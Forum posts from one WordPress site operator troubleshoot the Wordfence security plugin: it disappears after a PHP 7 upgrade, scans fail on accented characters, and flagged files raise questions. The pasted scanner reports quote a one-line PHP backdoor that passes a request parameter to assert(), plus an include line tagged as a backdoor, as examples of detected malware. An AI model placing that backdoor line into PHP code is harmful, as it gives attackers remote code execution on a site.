LMD99

Prior to the PHP upgrade (while using PHP5), the site works fine, in the WP dashboard I can see all plugins (including Wordfence) and via FTP – all of the following plugin folders are visible.

Contact form 7
google sitemap generator
php compatibility checker
seo ultimate
updraftplus
wordfence
wp-editor
wp fastest cache

After updating the web space to PHP7, the site works fine, I can see all of the above plugin folders via FTP (including Wordfence), but when I look at the plugins in WordPress Dashboard, I only see three plugins, and Wordfence isn’t one of the three. These are what I see in the WP dashboard.

Contact form 7
Google XML sitemaps
PHP compatibility checker

Also, I’m not using Jetpack.

• This reply was modified 6 years, 4 months ago by LMD99.

I’m not using a WordPress Network. It’s a managed VMS plan which I can host up to 90 domains, but each site is supposed to have it’s own and separate “hosted environment”. So this site is technically a stand-alone site on a shared server.

When I use the PHP compatibility checker plugin, the results for Wordfence show as “Unknown”. And the details: “The plugin/theme was skipped as it was too large to scan before the server killed the process.”

Regardless, the Wordfence plugin isn’t visible in the WP dashboard plugin page when I upgrade the PHP version from 5.x to 7.x.

Is there anything specific I can ask our hosting support that I can post here for further clarification?

• This reply was modified 6 years, 5 months ago by LMD99.
• This reply was modified 6 years, 5 months ago by LMD99.

Diagnostic report sent.

Ya, I’m getting more notices from other WP domains using this plugin now.

Hey, thanks for the response. I’ve checked disk space in the CP and my allotment isn’t tied to one or two hosting spaces. It’s allotted as a whole, across 90 potential domain spaces. And and even with the 50 domain spaces in use, I’ve got many, many gigs of space left.

Disk Usage (MB)
( 22611 / 108000 )

I would also think, if there was/is a PHP issue, it would be server wide and all my domains using the WP plugin would be affected, which doesn’t seem to be the case.

It’s actually a VMS account I’m using and I don’t know how everything gets balanced, but I’d assume it’s not all neatly organized on one server, with one drive being suspect. I could be wrong on all this, but I’ll just monitor things for a bit and see if the issue resolves itself, or, if I keep getting the warnings. Then I’ll approach the server admins. And, BTW, when they “get wind” of it being a WP issue, they continue to voice that they don’t support WordPress, and especially not third party plugins.

• This reply was modified 6 years, 9 months ago by LMD99.

@surge42 – where exactly is the shortcode you suggest to use to be added?

Hey Matt – thanks for your reply. What about this file notice? Its one of many that are flagged as problematic, but before I get to notifying the site owner of the issue, then asking you guys to look into it (for a fee, yes I know), what can you tell us here? Is this example below an issue, false positive or what?

File appears to be malicious: wp-includes/pomo/index.php

Filename:
wp-includes/pomo/index.php

File type:
Not a core, theme or plugin file.

Issue first detected:
4 hours 35 mins ago.

Severity:
Critical

Status
New
This file appears to be installed by a hacker to perform malicious activity. If you know about this file you can choose to ignore it to exclude it from future scans. The text we found in this file that matches a known malicious file is: “if(isset($_REQUEST[‘bot’])) assert(stripslashes($_REQUEST[bot]));”. The infection type is: Backdoor:PHP/botrequest.

Can these files just be removed? “this file appears to be installed by a hacker…”

• This reply was modified 7 years, 11 months ago by LMD99. Reason: add

@fatimajesus, how many files are you referring to? I know this thread started with one file being an issue, but WF has flagged a few dozen in my latest scan as having malicious code.

Add – I uploaded a new version of wp-load.php right from a recently downloaded version of WP 4.7. I renamed the suspect file on the server to: wp-load-old.php. I then uploaded the new file, wp-load.php, did another scan and found that both files were tagged as malicious.

Both the new and original file on the server have the same malicious code:

The text we found in this file that matches a known malicious file is: “@include( ABSPATH . WPINC . ‘/SimplePie/gzpdecode.php’);”. The infection type is: Backdoor:PHP/gzpdecode.

Subscribing to this thread. I’ve seen this file warning and other files too, on a recent scan. All plugins are up to date, WP versions updated and FTP and WP passwords are very strong.

This one file:

Filename:
wp-load.php

File type:
Core

Issue first detected:
19 mins ago.

Severity:
Critical
Status
New
This file appears to be installed by a hacker to perform malicious activity. If you know about this file you can choose to ignore it to exclude it from future scans. The text we found in this file that matches a known malicious file is: “@include( ABSPATH . WPINC . ‘/SimplePie/gzpdecode.php’);”. The infection type is: Backdoor:PHP/gzpdecode.

• This reply was modified 7 years, 11 months ago by LMD99.
• This reply was modified 7 years, 11 months ago by LMD99. Reason: add

Ok, I disabled WF and removed the data and tables, so now, it appears to be scanning. I don’t know if it was the characters with the “accent”, or the WF table data was corrupt. Either way it’s working.

Now, how do I get rid of the “Live Updates Paused” every time I have a scan going and I click off that window to go on to something else while the scan is performing? This is a bit of a pain as I have to watch the scan complete before doing anything else.

Please advise.

I have one page on that site and the page path title is shown as “Home / Members / Alex Sándor Vezér” and, the text used on the page is “Alex Sándor Vezér”, so I have a feeling the accent over the “á”, and the “é” just might be causing the issue.

However – I cleared cache, after removing the accent over the letters on the page and saving the change, but am still getting the error message when trying the WF scan function.

See the snapshot

The server security support guys indicate the error looks like it’s being generated as a result, or from line 247 in the wordfenceScanner.php file. Something about non-Unicode characters in the file name.

Any idea if this line of code can be changed so I can get the scanner function working??

Our security support came back saying they looked in the backend and said “this is a PHP function warning messages masked as a generic error message generated from the plugin in question.”

And then the “we don’t support 3rd party plugins, yada, yada”. Leaving me in the position to not be able to do a normal scan of the site files.

• This reply was modified 8 years, 1 month ago by LMD99.

Thanks for that link. It may help to validate the issue I’m experience to our server admins.

So, I have contacted our server admin support again, but now I’m armed with this new information (the link). And, this time when accessing the domains experiencing this issue from their end, they did experience the same error message.

The odd thing is that 12 other WP domains using the same theme, WordPress version and current WordFence plugin, in the same hosting environment do not experience that error. I will post support’s conclusions when they’ve investigated the issue and report back to me on their findings.